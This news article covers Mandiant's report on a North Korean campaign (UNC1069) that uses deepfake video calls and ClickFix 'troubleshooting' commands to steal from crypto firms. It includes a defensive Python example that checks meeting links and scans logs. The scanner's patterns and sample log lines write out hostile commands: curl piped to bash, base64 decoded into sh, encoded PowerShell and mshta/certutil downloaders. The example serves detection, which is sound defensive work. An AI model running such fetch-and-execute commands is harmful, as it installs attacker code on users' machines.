Google's Mandiant Warns of Sophisticated North Korean AI Deepfake Campaign Targeting Crypto Industry


Key takeaways:

  • AI-powered social engineering attacks could accelerate regulatory scrutiny on crypto security protocols.
  • North Korea's escalating thefts may pressure exchange security standards and institutional adoption timelines.
  • Deepfake threats highlight operational risks for crypto firms reliant on remote collaboration and digital verification.

Google's cybersecurity firm Mandiant has issued a stark warning about a significant escalation in North Korean cyberattacks targeting the cryptocurrency industry. State-sponsored hackers are now employing artificial intelligence-generated deepfakes and fake video meetings as part of highly sophisticated social engineering campaigns aimed at stealing digital assets.

The report details a specific intrusion at a fintech company attributed to UNC1069, also known as "CryptoCore," a threat actor linked with high confidence to North Korea. The attack chain began with the victim being contacted on Telegram by a compromised account impersonating a known cryptocurrency executive. After building rapport, the attacker sent a Calendly link for a meeting, directing the victim to a fake Zoom call hosted on the group's own infrastructure.

During the call, the victim reported seeing what appeared to be a deepfake video of a well-known crypto CEO. The attackers then claimed audio problems and instructed the victim to run "troubleshooting" commands, a technique known as ClickFix, in which the target is talked into pasting attacker-supplied commands into their own terminal or Run dialog so that the victim, not an exploit, launches the payload. Running the commands triggered a malware infection. Forensic analysis identified seven distinct malware families deployed to harvest credentials, browser data, and session tokens for financial theft and future impersonation.
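Two defensive checks follow from the chain described above: the meeting link pointed at attacker-controlled infrastructure rather than the real conferencing provider, and the infection required the victim to paste commands into a terminal. The block below is an added illustration, not code from Mandiant's report or from the firms named in the article. The allowlisted meeting domains, the log-line format, and the ClickFix command patterns are all assumptions chosen for the example; the sample log lines are constructed and are not indicators from the campaign.

```python
"""Added example: (1) allowlist check for meeting URLs, (2) ClickFix-style
command detection over process-creation log lines. Constructed data only."""
import re
from urllib.parse import urlsplit

# Assumed allowlist: hosts this organisation accepts meeting links from.
MEETING_HOST_ALLOWLIST = {"zoom.us", "teams.microsoft.com", "meet.google.com"}


def meeting_link_is_trusted(url: str) -> bool:
    """True only if the link is https and its host is an allowlisted domain
    or a subdomain of one. urlsplit() strips userinfo, so
    'https://zoom.us@evil.example/' resolves to evil.example, not zoom.us."""
    parts = urlsplit(url.strip())
    if parts.scheme != "https":
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in MEETING_HOST_ALLOWLIST)


# Generic shapes of "paste this to fix your audio" commands (assumed patterns,
# not campaign-specific IOCs): download-and-execute, base64-decode-to-shell,
# encoded PowerShell, LOLBin downloaders, and AppleScript shell execution.
CLICKFIX_PATTERNS = [
    re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|)sh\b"),
    re.compile(r"\b(bash|sh|zsh)\s+-c\s+[\"']?\$\((curl|wget)\b"),
    re.compile(r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(ba|z|)sh\b"),
    re.compile(r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I),
    re.compile(r"\b(mshta|certutil\s+-urlcache|rundll32\s+javascript:)", re.I),
    re.compile(r"\bosascript\s+-e\b.*\b(do shell script|curl)\b"),
]

# Assumed log format: "<ts> <user> parent=<process> cmd=<command line>".
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<user>\S+)\s+parent=(?P<parent>\S+)\s+cmd=(?P<cmd>.*)$")

# Parents that imply a human typed or pasted the command (assumed list).
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "gnome-terminal", "cmd.exe",
                       "powershell.exe", "explorer.exe"}


def detect_clickfix(log_lines):
    """Return one record per line whose command matches a ClickFix pattern.
    'interactive' is True when the parent is a user-facing shell or launcher,
    which is the ClickFix signature: the user ran it, not a dropper."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        cmd = m["cmd"]
        if not any(p.search(cmd) for p in CLICKFIX_PATTERNS):
            continue
        hits.append({
            "ts": m["ts"],
            "user": m["user"],
            "interactive": m["parent"] in INTERACTIVE_PARENTS,
            "cmd": cmd,
        })
    return hits


# Constructed sample log; hosts are reserved .invalid names.
SAMPLE_LOG = [
    "2025-01-01T10:00:00Z alice parent=Terminal cmd=git pull origin main",
    "2025-01-01T10:05:00Z alice parent=Terminal cmd=curl -fsSL https://example.invalid/fix.sh | bash",
    "2025-01-01T10:05:30Z alice parent=Terminal cmd=curl -sI https://example.invalid/ | head -n 1",
    "2025-01-01T10:06:00Z bob parent=iTerm2 cmd=bash -c \"$(curl -fsSL https://example.invalid/fix)\"",
    "2025-01-01T10:07:00Z bob parent=cron cmd=echo aGVsbG8= | base64 -d | sh",
    "2025-01-01T10:08:00Z carol parent=explorer.exe cmd=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A",
]

if __name__ == "__main__":
    for link in ("https://us02web.zoom.us/j/123", "https://zoom.us.evil.example/j/123",
                 "https://zoom.us@evil.example/j/123"):
        print(link, "trusted" if meeting_link_is_trusted(link) else "NOT trusted")
    for hit in detect_clickfix(SAMPLE_LOG):
        print(hit)
```

The host check treats lookalike subdomains (`zoom.us.evil.example`) and userinfo tricks (`zoom.us@evil.example`) as untrusted, which is where a fake conferencing page hosted on the attacker's own infrastructure would sit. The command detector is deliberately broad; in practice the `interactive` flag is what separates a ClickFix victim pasting into a terminal from a scheduled job, so route those hits to a human rather than auto-closing them.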

Mandiant stated that UNC1069 is targeting corporate entities and individuals within the cryptocurrency sector, including software firms, developers, venture capital firms, and their employees or executives. This warning comes as North Korea's crypto thefts continue to grow. Blockchain analytics firm Chainalysis reported that North Korean hackers stole $2.02 billion in cryptocurrency in 2025, a 51% increase from the year before. The total stolen by DPRK-linked actors now stands at roughly $6.75 billion.

"The effectiveness of this approach comes from how little has to look unusual," said Fraser Edwards, CEO of decentralized identity firm cheqd. "The sender is familiar. The meeting format is routine... Trust is leveraged before any technical defence has a chance to intervene." Edwards warned that the risk will increase as AI agents are integrated into everyday communication, potentially automating deepfake deployment and turning impersonation into a scalable process.

Experts emphasize that this evolution represents a dangerous new frontier: the attack exploits the trust inherent in remote work and digital collaboration rather than a software flaw, so conventional perimeter and endpoint controls only engage after the victim has already acted. The industry faces threats that erode that fundamental trust and may lead to stricter regulatory security mandates and increased operational costs for companies across the cryptocurrency ecosystem.

Disclaimer

The content on this website is provided for information purposes only and does not constitute investment advice, an offer, or professional consultation. Crypto assets are high-risk and volatile — you may lose all funds. Some materials may include summaries and links to third-party sources; we are not responsible for their content or accuracy. Any decisions you make are at your own risk. Coinalertnews recommends independently verifying information and consulting with a professional before making any financial decisions based on this content.